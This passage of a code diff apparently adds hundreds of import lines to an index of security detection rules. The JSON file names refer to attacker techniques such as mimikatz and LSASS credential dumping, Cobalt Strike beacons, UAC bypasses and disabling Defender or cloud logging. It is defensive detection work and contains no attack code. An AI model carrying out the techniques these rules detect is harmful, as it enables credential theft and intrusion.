'./persistence_ml_windows_anomalous_service.json'; +import rule116 from './privilege_escalation_ml_windows_rare_user_runas_event.json'; +import rule117 from './execution_suspicious_pdf_reader.json'; +import rule118 from './privilege_escalation_sudoers_file_mod.json'; +import rule119 from './defense_evasion_iis_httplogging_disabled.json'; +import rule120 from './execution_python_tty_shell.json'; +import rule121 from './execution_perl_tty_shell.json'; +import rule122 from './defense_evasion_base16_or_base32_encoding_or_decoding_activity.json'; +import rule123 from './defense_evasion_file_mod_writable_dir.json'; +import rule124 from './defense_evasion_disable_selinux_attempt.json'; +import rule125 from './discovery_kernel_module_enumeration.json'; +import rule126 from './lateral_movement_telnet_network_activity_external.json'; +import rule127 from './lateral_movement_telnet_network_activity_internal.json'; +import rule128 from './privilege_escalation_setuid_setgid_bit_set_via_chmod.json'; +import rule129 from './defense_evasion_kernel_module_removal.json'; +import rule130 from './defense_evasion_attempt_to_disable_syslog_service.json'; +import rule131 from './defense_evasion_file_deletion_via_shred.json'; +import rule132 from './discovery_virtual_machine_fingerprinting.json'; +import rule133 from './defense_evasion_hidden_file_dir_tmp.json'; +import rule134 from './defense_evasion_deletion_of_bash_command_line_history.json'; +import rule135 from './impact_cloudwatch_log_group_deletion.json'; +import rule136 from './impact_cloudwatch_log_stream_deletion.json'; +import rule137 from './impact_rds_instance_cluster_stoppage.json'; +import rule138 from './persistence_attempt_to_deactivate_mfa_for_okta_user_account.json'; +import rule139 from './persistence_rds_cluster_creation.json'; +import rule140 from './credential_access_attempted_bypass_of_okta_mfa.json'; +import rule141 from './defense_evasion_okta_attempt_to_deactivate_okta_policy.json'; +import rule142 from './defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.json'; +import rule143 from './defense_evasion_okta_attempt_to_modify_okta_network_zone.json'; +import rule144 from './defense_evasion_okta_attempt_to_modify_okta_policy.json'; +import rule145 from './defense_evasion_okta_attempt_to_modify_okta_policy_rule.json'; +import rule146 from './defense_evasion_waf_acl_deletion.json'; +import rule147 from './impact_attempt_to_revoke_okta_api_token.json'; +import rule148 from './impact_iam_group_deletion.json'; +import rule149 from './impact_possible_okta_dos_attack.json'; +import rule150 from './impact_rds_instance_cluster_deletion.json'; +import rule151 from './initial_access_suspicious_activity_reported_by_okta_user.json'; +import rule152 from './okta_threat_detected_by_okta_threatinsight.json'; +import rule153 from './persistence_administrator_privileges_assigned_to_okta_group.json'; +import rule154 from './persistence_attempt_to_create_okta_api_token.json'; +import rule155 from './persistence_attempt_to_reset_mfa_factors_for_okta_user_account.json'; +import rule156 from './defense_evasion_cloudtrail_logging_deleted.json'; +import rule157 from './defense_evasion_ec2_network_acl_deletion.json'; +import rule158 from './impact_iam_deactivate_mfa_device.json'; +import rule159 from './defense_evasion_s3_bucket_configuration_deletion.json'; +import rule160 from './defense_evasion_guardduty_detector_deletion.json'; +import rule161 from './defense_evasion_okta_attempt_to_delete_okta_policy.json'; +import rule162 from './credential_access_iam_user_addition_to_group.json'; +import rule163 from './persistence_ec2_network_acl_creation.json'; +import rule164 from './impact_ec2_disable_ebs_encryption.json'; +import rule165 from './persistence_iam_group_creation.json'; +import rule166 from './defense_evasion_waf_rule_or_rule_group_deletion.json'; +import rule167 from './collection_cloudtrail_logging_created.json'; +import rule168 from './defense_evasion_cloudtrail_logging_suspended.json'; +import rule169 from './impact_cloudtrail_logging_updated.json'; +import rule170 from './initial_access_console_login_root.json'; +import rule171 from './defense_evasion_cloudwatch_alarm_deletion.json'; +import rule172 from './defense_evasion_ec2_flow_log_deletion.json'; +import rule173 from './defense_evasion_configuration_recorder_stopped.json'; +import rule174 from './exfiltration_ec2_snapshot_change_activity.json'; +import rule175 from './defense_evasion_config_service_rule_deletion.json'; +import rule176 from './persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.json'; +import rule177 from './command_and_control_download_rar_powershell_from_internet.json'; +import rule178 from './initial_access_password_recovery.json'; +import rule179 from './command_and_control_cobalt_strike_beacon.json'; +import rule180 from './command_and_control_fin7_c2_behavior.json'; +import rule181 from './command_and_control_halfbaked_beacon.json'; +import rule182 from './credential_access_secretsmanager_getsecretvalue.json'; +import rule183 from './initial_access_via_system_manager.json'; +import rule184 from './privilege_escalation_root_login_without_mfa.json'; +import rule185 from './privilege_escalation_updateassumerolepolicy.json'; +import rule186 from './impact_hosts_file_modified.json'; +import rule187 from './elastic_endpoint_security.json'; +import rule188 from './external_alerts.json'; +import rule189 from './ml_cloudtrail_error_message_spike.json'; +import rule190 from './ml_cloudtrail_rare_error_code.json'; +import rule191 from './ml_cloudtrail_rare_method_by_city.json'; +import rule192 from './ml_cloudtrail_rare_method_by_country.json'; +import rule193 from './ml_cloudtrail_rare_method_by_user.json'; +import rule194 from './credential_access_aws_iam_assume_role_brute_force.json'; +import rule195 from './credential_access_okta_brute_force_or_password_spraying.json'; +import rule196 from './initial_access_unusual_dns_service_children.json'; +import rule197 from './initial_access_unusual_dns_service_file_writes.json'; +import rule198 from './lateral_movement_dns_server_overflow.json'; +import rule199 from './credential_access_root_console_failure_brute_force.json'; +import rule200 from './initial_access_unsecure_elasticsearch_node.json'; +import rule201 from './impact_virtual_network_device_modified.json'; +import rule202 from './credential_access_domain_backup_dpapi_private_keys.json'; +import rule203 from './persistence_gpo_schtask_service_creation.json'; +import rule204 from './credential_access_credentials_keychains.json'; +import rule205 from './credential_access_kerberosdump_kcc.json'; +import rule206 from './defense_evasion_attempt_del_quarantine_attrib.json'; +import rule207 from './execution_suspicious_psexesvc.json'; +import rule208 from './execution_via_xp_cmdshell_mssql_stored_procedure.json'; +import rule209 from './privilege_escalation_printspooler_service_suspicious_file.json'; +import rule210 from './privilege_escalation_printspooler_suspicious_spl_file.json'; +import rule211 from './defense_evasion_azure_diagnostic_settings_deletion.json'; +import rule212 from './execution_command_virtual_machine.json'; +import rule213 from './execution_via_hidden_shell_conhost.json'; +import rule214 from './impact_resource_group_deletion.json'; +import rule215 from './persistence_via_telemetrycontroller_scheduledtask_hijack.json'; +import rule216 from './persistence_via_update_orchestrator_service_hijack.json'; +import rule217 from './collection_update_event_hub_auth_rule.json'; +import rule218 from './credential_access_iis_apppoolsa_pwd_appcmd.json'; +import rule219 from './credential_access_iis_connectionstrings_dumping.json'; +import rule220 from './defense_evasion_event_hub_deletion.json'; +import rule221 from './defense_evasion_firewall_policy_deletion.json'; +import rule222 from './defense_evasion_sdelete_like_filename_rename.json'; +import rule223 from './lateral_movement_remote_ssh_login_enabled.json'; +import rule224 from './persistence_azure_automation_account_created.json'; +import rule225 from './persistence_azure_automation_runbook_created_or_modified.json'; +import rule226 from './persistence_azure_automation_webhook_created.json'; +import rule227 from './privilege_escalation_uac_bypass_diskcleanup_hijack.json'; +import rule228 from './credential_access_attempts_to_brute_force_okta_user_account.json'; +import rule229 from './credential_access_storage_account_key_regenerated.json'; +import rule230 from './defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.json'; +import rule231 from './defense_evasion_system_critical_proc_abnormal_file_activity.json'; +import rule232 from './defense_evasion_unusual_system_vp_child_program.json'; +import rule233 from './discovery_blob_container_access_mod.json'; +import rule234 from './persistence_mfa_disabled_for_azure_user.json'; +import rule235 from './persistence_user_added_as_owner_for_azure_application.json'; +import rule236 from './persistence_user_added_as_owner_for_azure_service_principal.json'; +import rule237 from './defense_evasion_dotnet_compiler_parent_process.json'; +import rule238 from './defense_evasion_suspicious_managedcode_host_process.json'; +import rule239 from './execution_command_shell_started_by_unusual_process.json'; +import rule240 from './defense_evasion_masquerading_as_elastic_endpoint_process.json'; +import rule241 from './defense_evasion_masquerading_suspicious_werfault_childproc.json'; +import rule242 from './defense_evasion_masquerading_werfault.json'; +import rule243 from './credential_access_key_vault_modified.json'; +import rule244 from './credential_access_mimikatz_memssp_default_logs.json'; +import rule245 from './defense_evasion_code_injection_conhost.json'; +import rule246 from './defense_evasion_network_watcher_deletion.json'; +import rule247 from './initial_access_external_guest_user_invite.json'; +import rule248 from './defense_evasion_azure_automation_runbook_deleted.json'; +import rule249 from './defense_evasion_masquerading_renamed_autoit.json'; +import rule250 from './initial_access_consent_grant_attack_via_azure_registered_application.json'; +import rule251 from './persistence_azure_conditional_access_policy_modified.json'; +import rule252 from './persistence_azure_privileged_identity_management_role_modified.json'; +import rule253 from './command_and_control_teamviewer_remote_file_copy.json'; +import rule254 from './defense_evasion_installutil_beacon.json'; +import rule255 from './defense_evasion_mshta_beacon.json'; +import rule256 from './defense_evasion_network_connection_from_windows_binary.json'; +import rule257 from './defense_evasion_rundll32_no_arguments.json'; +import rule258 from './defense_evasion_suspicious_scrobj_load.json'; +import rule259 from './defense_evasion_suspicious_wmi_script.json'; +import rule260 from './execution_ms_office_written_file.json'; +import rule261 from './execution_pdf_written_file.json'; +import rule262 from './lateral_movement_cmd_service.json'; +import rule263 from './persistence_app_compat_shim.json'; +import rule264 from './command_and_control_remote_file_copy_desktopimgdownldr.json'; +import rule265 from './command_and_control_remote_file_copy_mpcmdrun.json'; +import rule266 from './defense_evasion_execution_suspicious_explorer_winword.json'; +import rule267 from './defense_evasion_suspicious_zoom_child_process.json'; +import rule268 from './discovery_ml_linux_system_information_discovery.json'; +import rule269 from './discovery_ml_linux_system_network_configuration_discovery.json'; +import rule270 from './discovery_ml_linux_system_network_connection_discovery.json'; +import rule271 from './discovery_ml_linux_system_process_discovery.json'; +import rule272 from './discovery_ml_linux_system_user_discovery.json'; +import rule273 from './privilege_escalation_ml_linux_anomalous_sudo_activity.json'; +import rule274 from './resource_development_ml_linux_anomalous_compiler_activity.json'; +import rule275 from './discovery_post_exploitation_external_ip_lookup.json'; +import rule276 from './initial_access_zoom_meeting_with_no_passcode.json'; +import rule277 from './defense_evasion_gcp_logging_sink_deletion.json'; +import rule278 from './defense_evasion_gcp_pub_sub_topic_deletion.json'; +import rule279 from './defense_evasion_gcp_firewall_rule_created.json'; +import rule280 from './defense_evasion_gcp_firewall_rule_deleted.json'; +import rule281 from './defense_evasion_gcp_firewall_rule_modified.json'; +import rule282 from './defense_evasion_gcp_logging_bucket_deletion.json'; +import rule283 from './defense_evasion_gcp_storage_bucket_permissions_modified.json'; +import rule284 from './impact_gcp_storage_bucket_deleted.json'; +import rule285 from './initial_access_gcp_iam_custom_role_creation.json'; +import rule286 from './persistence_gcp_iam_service_account_key_deletion.json'; +import rule287 from './persistence_gcp_key_created_for_service_account.json'; +import rule288 from './credential_access_ml_linux_anomalous_metadata_process.json'; +import rule289 from './credential_access_ml_linux_anomalous_metadata_user.json'; +import rule290 from './credential_access_ml_windows_anomalous_metadata_process.json'; +import rule291 from './credential_access_ml_windows_anomalous_metadata_user.json'; +import rule292 from './defense_evasion_gcp_storage_bucket_configuration_modified.json'; +import rule293 from './defense_evasion_gcp_virtual_private_cloud_network_deleted.json'; +import rule294 from './defense_evasion_gcp_virtual_private_cloud_route_created.json'; +import rule295 from './defense_evasion_gcp_virtual_private_cloud_route_deleted.json'; +import rule296 from './exfiltration_gcp_logging_sink_modification.json'; +import rule297 from './impact_gcp_iam_role_deletion.json'; +import rule298 from './impact_gcp_service_account_deleted.json'; +import rule299 from './impact_gcp_service_account_disabled.json'; +import rule300 from './persistence_gcp_service_account_created.json'; +import rule301 from './collection_gcp_pub_sub_subscription_creation.json'; +import rule302 from './collection_gcp_pub_sub_topic_creation.json'; +import rule303 from './defense_evasion_gcp_pub_sub_subscription_deletion.json'; +import rule304 from './persistence_azure_pim_user_added_global_admin.json'; +import rule305 from './command_and_control_cobalt_strike_default_teamserver_cert.json'; +import rule306 from './defense_evasion_enable_inbound_rdp_with_netsh.json'; +import rule307 from './defense_evasion_execution_lolbas_wuauclt.json'; +import rule308 from './privilege_escalation_unusual_svchost_childproc_childless.json'; +import rule309 from './command_and_control_rdp_tunnel_plink.json'; +import rule310 from './privilege_escalation_uac_bypass_winfw_mmc_hijack.json'; +import rule311 from './discovery_privileged_localgroup_membership.json'; +import rule312 from './persistence_ms_office_addins_file.json'; +import rule313 from './discovery_adfind_command_activity.json'; +import rule314 from './discovery_security_software_wmic.json'; +import rule315 from './execution_command_shell_via_rundll32.json'; +import rule316 from './execution_suspicious_cmd_wmi.json'; +import rule317 from './lateral_movement_via_startup_folder_rdp_smb.json'; +import rule318 from './privilege_escalation_uac_bypass_com_interface_icmluautil.json'; +import rule319 from './privilege_escalation_uac_bypass_mock_windir.json'; +import rule320 from './defense_evasion_potential_processherpaderping.json'; +import rule321 from './privilege_escalation_uac_bypass_dll_sideloading.json'; +import rule322 from './execution_shared_modules_local_sxs_dll.json'; +import rule323 from './privilege_escalation_uac_bypass_com_clipup.json'; +import rule324 from './initial_access_via_explorer_suspicious_child_parent_args.json'; +import rule325 from './defense_evasion_from_unusual_directory.json'; +import rule326 from './execution_from_unusual_path_cmdline.json'; +import rule327 from './credential_access_kerberoasting_unusual_process.json'; +import rule328 from './discovery_peripheral_device.json'; +import rule329 from './lateral_movement_mount_hidden_or_webdav_share_net.json'; +import rule330 from './defense_evasion_deleting_websvr_access_logs.json'; +import rule331 from './defense_evasion_log_files_deleted.json'; +import rule332 from './defense_evasion_timestomp_touch.json'; +import rule333 from './lateral_movement_dcom_hta.json'; +import rule334 from './lateral_movement_execution_via_file_shares_sequence.json'; +import rule335 from './privilege_escalation_uac_bypass_com_ieinstal.json'; +import rule336 from './command_and_control_common_webservices.json'; +import rule337 from './command_and_control_encrypted_channel_freesslcert.json'; +import rule338 from './defense_evasion_process_termination_followed_by_deletion.json'; +import rule339 from './lateral_movement_remote_file_copy_hidden_share.json'; +import rule340 from './defense_evasion_attempt_to_deactivate_okta_network_zone.json'; +import rule341 from './defense_evasion_attempt_to_delete_okta_network_zone.json'; +import rule342 from './defense_evasion_okta_attempt_to_delete_okta_policy_rule.json'; +import rule343 from './impact_okta_attempt_to_deactivate_okta_application.json'; +import rule344 from './impact_okta_attempt_to_delete_okta_application.json'; +import rule345 from './impact_okta_attempt_to_modify_okta_application.json'; +import rule346 from './lateral_movement_dcom_mmc20.json'; +import rule347 from './lateral_movement_dcom_shellwindow_shellbrowserwindow.json'; +import rule348 from './persistence_administrator_role_assigned_to_okta_user.json'; +import rule349 from './lateral_movement_executable_tool_transfer_smb.json'; +import rule350 from './command_and_control_dns_tunneling_nslookup.json'; +import rule351 from './lateral_movement_execution_from_tsclient_mup.json'; +import rule352 from './lateral_movement_rdp_sharprdp_target.json'; +import rule353 from './defense_evasion_clearing_windows_security_logs.json'; +import rule354 from './persistence_google_workspace_api_access_granted_via_domain_wide_delegation_of_authority.json'; +import rule355 from './defense_evasion_suspicious_short_program_name.json'; +import rule356 from './lateral_movement_incoming_wmi.json'; +import rule357 from './persistence_via_hidden_run_key_valuename.json'; +import rule358 from './credential_access_potential_ssh_bruteforce.json'; +import rule359 from './credential_access_promt_for_pwd_via_osascript.json'; +import rule360 from './lateral_movement_remote_services.json'; +import rule361 from './defense_evasion_domain_added_to_google_workspace_trusted_domains.json'; +import rule362 from './execution_suspicious_image_load_wmi_ms_office.json'; +import rule363 from './execution_suspicious_powershell_imgload.json'; +import rule364 from './impact_google_workspace_admin_role_deletion.json'; +import rule365 from './impact_google_workspace_mfa_enforcement_disabled.json'; +import rule366 from './persistence_application_added_to_google_workspace_domain.json'; +import rule367 from './persistence_evasion_registry_ifeo_injection.json'; +import rule368 from './persistence_google_workspace_admin_role_assigned_to_user.json'; +import rule369 from './persistence_google_workspace_custom_admin_role_created.json'; +import rule370 from './persistence_google_workspace_policy_modified.json'; +import rule371 from './persistence_google_workspace_role_modified.json'; +import rule372 from './persistence_mfa_disabled_for_google_workspace_organization.json'; +import rule373 from './persistence_suspicious_image_load_scheduled_task_ms_office.json'; +import rule374 from './defense_evasion_masquerading_trusted_directory.json'; +import rule375 from './exfiltration_microsoft_365_exchange_transport_rule_creation.json'; +import rule376 from './initial_access_microsoft_365_exchange_safelinks_disabled.json'; +import rule377 from './persistence_appcertdlls_registry.json'; +import rule378 from './persistence_appinitdlls_registry.json'; +import rule379 from './persistence_microsoft_365_exchange_dkim_signing_config_disabled.json'; +import rule380 from './persistence_registry_uncommon.json'; +import rule381 from './persistence_run_key_and_startup_broad.json'; +import rule382 from './persistence_services_registry.json'; +import rule383 from './persistence_startup_folder_file_written_by_suspicious_process.json'; +import rule384 from './persistence_startup_folder_scripts.json'; +import rule385 from './persistence_suspicious_com_hijack_registry.json'; +import rule386 from './persistence_via_lsa_security_support_provider_registry.json'; +import rule387 from './defense_evasion_microsoft_365_exchange_malware_filter_policy_deletion.json'; +import rule388 from './defense_evasion_microsoft_365_exchange_malware_filter_rule_mod.json'; +import rule389 from './defense_evasion_microsoft_365_exchange_safe_attach_rule_disabled.json'; +import rule390 from './exfiltration_microsoft_365_exchange_transport_rule_mod.json'; +import rule391 from './initial_access_microsoft_365_exchange_anti_phish_policy_deletion.json'; +import rule392 from './initial_access_microsoft_365_exchange_anti_phish_rule_mod.json'; +import rule393 from './lateral_movement_suspicious_rdp_client_imageload.json'; +import rule394 from './persistence_runtime_run_key_startup_susp_procs.json'; +import rule395 from './persistence_suspicious_scheduled_task_runtime.json'; +import rule396 from './defense_evasion_microsoft_365_exchange_dlp_policy_removed.json'; +import rule397 from './lateral_movement_scheduled_task_target.json'; +import rule398 from './persistence_microsoft_365_exchange_management_role_assignment.json'; +import rule399 from './persistence_microsoft_365_teams_guest_access_enabled.json'; +import rule400 from './credential_access_dump_registry_hives.json'; +import rule401 from './defense_evasion_scheduledjobs_at_protocol_enabled.json'; +import rule402 from './persistence_ms_outlook_vba_template.json'; +import rule403 from './persistence_suspicious_service_created_registry.json'; +import rule404 from './privilege_escalation_named_pipe_impersonation.json'; +import rule405 from './credential_access_cmdline_dump_tool.json'; +import rule406 from './credential_access_copy_ntds_sam_volshadowcp_cmdline.json'; +import rule407 from './credential_access_lsass_memdump_file_created.json'; +import rule408 from './lateral_movement_incoming_winrm_shell_execution.json'; +import rule409 from './lateral_movement_powershell_remoting_target.json'; +import rule410 from './command_and_control_port_forwarding_added_registry.json'; +import rule411 from './defense_evasion_hide_encoded_executable_registry.json'; +import rule412 from './lateral_movement_rdp_enabled_registry.json'; +import rule413 from './privilege_escalation_printspooler_registry_copyfiles.json'; +import rule414 from './privilege_escalation_rogue_windir_environment_var.json'; +import rule415 from './initial_access_scripts_process_started_via_wmi.json'; +import rule416 from './command_and_control_iexplore_via_com.json'; +import rule417 from './command_and_control_remote_file_copy_scripts.json'; +import rule418 from './persistence_local_scheduled_task_scripting.json'; +import rule419 from './persistence_startup_folder_file_written_by_unsigned_process.json'; +import rule420 from './command_and_control_remote_file_copy_powershell.json'; +import rule421 from './credential_access_microsoft_365_brute_force_user_account_attempt.json'; +import rule422 from './persistence_microsoft_365_teams_custom_app_interaction_allowed.json'; +import rule423 from './persistence_microsoft_365_teams_external_access_enabled.json'; +import rule424 from './credential_access_microsoft_365_potential_password_spraying_attack.json'; +import rule425 from './impact_stop_process_service_threshold.json'; +import rule426 from './collection_winrar_encryption.json'; +import rule427 from './defense_evasion_unusual_dir_ads.json'; +import rule428 from './discovery_admin_recon.json'; +import rule429 from './discovery_net_view.json'; +import rule430 from './discovery_remote_system_discovery_commands_windows.json'; +import rule431 from './persistence_via_windows_management_instrumentation_event_subscription.json'; +import rule432 from './credential_access_mimikatz_powershell_module.json'; +import rule433 from './execution_scripting_osascript_exec_followed_by_netcon.json'; +import rule434 from './execution_shell_execution_via_apple_scripting.json'; +import rule435 from './persistence_creation_change_launch_agents_file.json'; +import rule436 from './persistence_creation_modif_launch_deamon_sequence.json'; +import rule437 from './persistence_folder_action_scripts_runtime.json'; +import rule438 from './persistence_login_logout_hooks_defaults.json'; +import rule439 from './privilege_escalation_explicit_creds_via_scripting.json'; +import rule440 from './command_and_control_sunburst_c2_activity_detected.json'; +import rule441 from './defense_evasion_azure_application_credential_modification.json'; +import rule442 from './defense_evasion_azure_service_principal_addition.json'; +import rule443 from './defense_evasion_solarwinds_backdoor_service_disabled_via_registry.json'; +import rule444 from './execution_apt_solarwinds_backdoor_child_cmd_powershell.json'; +import rule445 from './execution_apt_solarwinds_backdoor_unusual_child_processes.json'; +import rule446 from './initial_access_azure_active_directory_powershell_signin.json'; +import rule447 from './collection_email_powershell_exchange_mailbox.json'; +import rule448 from './execution_scheduled_task_powershell_source.json'; +import rule449 from './persistence_powershell_exch_mailbox_activesync_add_device.json'; +import rule450 from './persistence_docker_shortcuts_plist_modification.json'; +import rule451 from './persistence_evasion_hidden_local_account_creation.json'; +import rule452 from './persistence_finder_sync_plugin_pluginkit.json'; +import rule453 from './discovery_security_software_grep.json'; +import rule454 from './credential_access_cookies_chromium_browsers_debugging.json'; +import rule455 from './credential_access_ssh_backdoor_log.json'; +import rule456 from './persistence_credential_access_modify_auth_module_or_config.json'; +import rule457 from './persistence_credential_access_modify_ssh_binaries.json'; +import rule458 from './credential_access_collection_sensitive_files.json'; +import rule459 from './persistence_ssh_authorized_keys_modification.json'; +import rule460 from './defense_evasion_defender_disabled_via_registry.json'; +import rule461 from './defense_evasion_privacy_controls_tcc_database_modification.json'; +import rule462 from './execution_initial_access_suspicious_browser_childproc.json'; +import rule463 from './execution_script_via_automator_workflows.json'; +import rule464 from './persistence_modification_sublime_app_plugin_or_script.json'; +import rule465 from './privilege_escalation_applescript_with_admin_privs.json'; +import rule466 from './credential_access_dumping_keychain_security.json'; +import rule467 from './initial_access_azure_active_directory_high_risk_signin.json'; +import rule468 from './initial_access_suspicious_mac_ms_office_child_process.json'; +import rule469 from './credential_access_mitm_localhost_webproxy.json'; +import rule470 from './persistence_kde_autostart_modification.json'; +import rule471 from './persistence_user_account_added_to_privileged_group_ad.json'; +import rule472 from './defense_evasion_attempt_to_disable_gatekeeper.json'; +import rule473 from './defense_evasion_sandboxed_office_app_suspicious_zip_file.json'; +import rule474 from './persistence_emond_rules_file_creation.json'; +import rule475 from './persistence_emond_rules_process_execution.json'; +import rule476 from './discovery_users_domain_built_in_commands.json'; +import rule477 from './execution_pentest_eggshell_remote_admin_tool.json'; +import rule478 from './defense_evasion_install_root_certificate.json'; +import rule479 from './persistence_credential_access_authorization_plugin_creation.json'; +import rule480 from './persistence_directory_services_plugins_modification.json'; +import rule481 from './defense_evasion_modify_environment_launchctl.json'; +import rule482 from './defense_evasion_safari_config_change.json'; +import rule483 from './defense_evasion_apple_softupdates_modification.json'; +import rule484 from './credential_access_mod_wdigest_security_provider.json'; +import rule485 from './credential_access_saved_creds_vaultcmd.json'; +import rule486 from './defense_evasion_file_creation_mult_extension.json'; +import rule487 from './execution_enumeration_via_wmiprvse.json'; +import rule488 from './execution_suspicious_jar_child_process.json'; +import rule489 from './persistence_shell_profile_modification.json'; +import rule490 from './persistence_suspicious_calendar_modification.json'; +import rule491 from './persistence_time_provider_mod.json'; +import rule492 from './privilege_escalation_exploit_adobe_acrobat_updater.json'; +import rule493 from './defense_evasion_sip_provider_mod.json'; +import rule494 from './execution_com_object_xwizard.json'; +import rule495 from './privilege_escalation_disable_uac_registry.json'; +import rule496 from './defense_evasion_unusual_ads_file_creation.json'; +import rule497 from './persistence_loginwindow_plist_modification.json'; +import rule498 from './persistence_periodic_tasks_file_mdofiy.json'; +import rule499 from './persistence_via_atom_init_file_modification.json'; +import rule500 from './privilege_escalation_lsa_auth_package.json'; +import rule501 from './privilege_escalation_port_monitor_print_pocessor_abuse.json'; +import rule502 from './credential_access_dumping_hashes_bi_cmds.json'; +import rule503 from './lateral_movement_mounting_smb_share.json'; +import rule504 from './privilege_escalation_echo_nopasswd_sudoers.json'; +import rule505 from './privilege_escalation_ld_preload_shared_object_modif.json'; +import rule506 from './privilege_escalation_root_crontab_filemod.json'; +import rule507 from './defense_evasion_create_mod_root_certificate.json'; +import rule508 from './privilege_escalation_sudo_buffer_overflow.json'; +import rule509 from './execution_installer_package_spawned_network_event.json'; +import rule510 from './initial_access_suspicious_ms_exchange_files.json'; +import rule511 from './initial_access_suspicious_ms_exchange_process.json'; +import rule512 from './initial_access_suspicious_ms_exchange_worker_child_process.json'; +import rule513 from './persistence_evasion_registry_startup_shell_folder_modified.json'; +import rule514 from './persistence_local_scheduled_job_creation.json'; +import rule515 from './persistence_via_wmi_stdregprov_run_services.json'; +import rule516 from './credential_access_persistence_network_logon_provider_modification.json'; +import rule517 from './lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.json'; +import rule518 from './collection_microsoft_365_new_inbox_rule.json'; +import rule519 from './ml_high_count_network_denies.json'; +import rule520 from './ml_high_count_network_events.json'; +import rule521 from './ml_rare_destination_country.json'; +import rule522 from './ml_spike_in_traffic_to_a_country.json'; +import rule523 from './command_and_control_tunneling_via_earthworm.json'; +import rule524 from './lateral_movement_evasion_rdp_shadowing.json'; +import rule525 from './threat_intel_fleet_integrations.json'; +import rule526 from './exfiltration_ec2_vm_export_failure.json'; +import rule527 from './exfiltration_ec2_full_network_packet_capture_detected.json'; +import rule528 from './impact_azure_service_principal_credentials_added.json'; +import rule529 from './persistence_ec2_security_group_configuration_change_detection.json'; +import rule530 from './defense_evasion_disabling_windows_logs.json'; +import rule531 from './persistence_route_53_domain_transfer_lock_disabled.json'; +import rule532 from './persistence_route_53_domain_transferred_to_another_account.json'; +import rule533 from './initial_access_okta_user_attempted_unauthorized_access.json'; +import rule534 from './credential_access_user_excessive_sso_logon_errors.json'; +import rule535 from './persistence_exchange_suspicious_mailbox_right_delegation.json'; +import rule536 from './privilege_escalation_new_or_modified_federation_domain.json'; +import rule537 from './privilege_escalation_sts_assumerole_usage.json'; +import rule538 from './privilege_escalation_sts_getsessiontoken_abuse.json'; +import rule539 from './defense_evasion_suspicious_execution_from_mounted_device.json'; +import rule540 from './defense_evasion_unusual_network_connection_via_dllhost.json'; +import rule541 from './defense_evasion_amsienable_key_mod.json'; +import rule542 from './impact_rds_group_deletion.json'; +import rule543 from './persistence_rds_group_creation.json'; +import rule544 from './persistence_route_table_created.json'; +import rule545 from './persistence_route_table_modified_or_deleted.json'; +import rule546 from './exfiltration_rds_snapshot_export.json'; +import rule547 from './persistence_rds_instance_creation.json'; +import rule548 from './privilege_escalation_gcp_kubernetes_rolebindings_created_or_patched.json'; +import rule549 from './credential_access_ml_auth_spike_in_failed_logon_events.json'; +import rule550 from './credential_access_ml_auth_spike_in_logon_events.json'; +import rule551 from './credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.json'; +import rule552 from './initial_access_ml_auth_rare_hour_for_a_user_to_logon.json'; +import rule553 from './initial_access_ml_auth_rare_source_ip_for_a_user.json'; +import rule554 from './initial_access_ml_auth_rare_user_logon.json'; +import rule555 from './privilege_escalation_cyberarkpas_error_audit_event_promotion.json'; +import rule556 from './privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.json'; +import rule557 from './defense_evasion_kubernetes_events_deleted.json'; +import rule558 from './impact_kubernetes_pod_deleted.json'; +import rule559 from './exfiltration_rds_snapshot_restored.json'; +import rule560 from './privilege_escalation_printspooler_suspicious_file_deletion.json'; +import rule561 from './privilege_escalation_unusual_printspooler_childprocess.json'; +import rule562 from './defense_evasion_disabling_windows_defender_powershell.json'; +import rule563 from './defense_evasion_enable_network_discovery_with_netsh.json'; +import rule564 from './defense_evasion_execution_windefend_unusual_path.json'; +import rule565 from './defense_evasion_agent_spoofing_mismatched_id.json'; +import rule566 from './defense_evasion_agent_spoofing_multiple_hosts.json'; +import rule567 from './defense_evasion_parent_process_pid_spoofing.json'; +import rule568 from './impact_microsoft_365_potential_ransomware_activity.json'; +import rule569 from './impact_microsoft_365_unusual_volume_of_file_deletion.json'; +import rule570 from './initial_access_microsoft_365_user_restricted_from_sending_email.json'; +import rule571 from './defense_evasion_elasticache_security_group_creation.json'; +import rule572 from './defense_evasion_elasticache_security_group_modified_or_deleted.json'; +import rule573 from './impact_volume_shadow_copy_deletion_via_powershell.json'; +import rule574 from './persistence_route_53_hosted_zone_associated_with_a_vpc.json'; +import rule575 from './defense_evasion_defender_exclusion_via_powershell.json'; +import rule576 from './defense_evasion_dns_over_https_enabled.json'; +import rule577 from './defense_evasion_frontdoor_firewall_policy_deletion.json'; +import rule578 from './credential_access_azure_full_network_packet_capture_detected.json'; +import rule579 from './persistence_webshell_detection.json'; +import rule580 from './defense_evasion_suppression_rule_created.json'; +import rule581 from './impact_efs_filesystem_or_mount_deleted.json'; +import rule582 from './defense_evasion_execution_control_panel_suspicious_args.json'; +import rule583 from './defense_evasion_azure_blob_permissions_modified.json'; +import rule584 from './privilege_escalation_aws_suspicious_saml_activity.json'; +import rule585 from './credential_access_potential_lsa_memdump_via_mirrordump.json'; +import rule586 from './discovery_virtual_machine_fingerprinting_grep.json'; +import rule587 from './impact_backup_file_deletion.json'; +import rule588 from './credential_access_posh_minidump.json'; +import rule589 from './persistence_screensaver_engine_unexpected_child_process.json'; +import rule590 from './persistence_screensaver_plist_file_modification.json'; +import rule591 from './credential_access_suspicious_lsass_access_memdump.json'; +import rule592 from './defense_evasion_suspicious_process_access_direct_syscall.json'; +import rule593 from './discovery_posh_suspicious_api_functions.json'; +import rule594 from './privilege_escalation_via_rogue_named_pipe.json'; +import rule595 from './credential_access_suspicious_lsass_access_via_snapshot.json'; +import rule596 from './defense_evasion_posh_process_injection.json'; +import rule597 from './collection_posh_keylogger.json'; +import rule598 from './defense_evasion_posh_assembly_load.json'; +import rule599 from './defense_evasion_powershell_windows_firewall_disabled.json'; +import rule600 from './execution_posh_portable_executable.json'; +import rule601 from './execution_posh_psreflect.json'; +import rule602 from './credential_access_suspicious_comsvcs_imageload.json'; +import rule603 from './impact_aws_eventbridge_rule_disabled_or_deleted.json'; +import rule604 from './defense_evasion_microsoft_defender_tampering.json'; +import rule605 from './initial_access_azure_active_directory_high_risk_signin_atrisk_or_confirmed.json'; +import rule606 from './persistence_remote_password_reset.json'; +import rule607 from 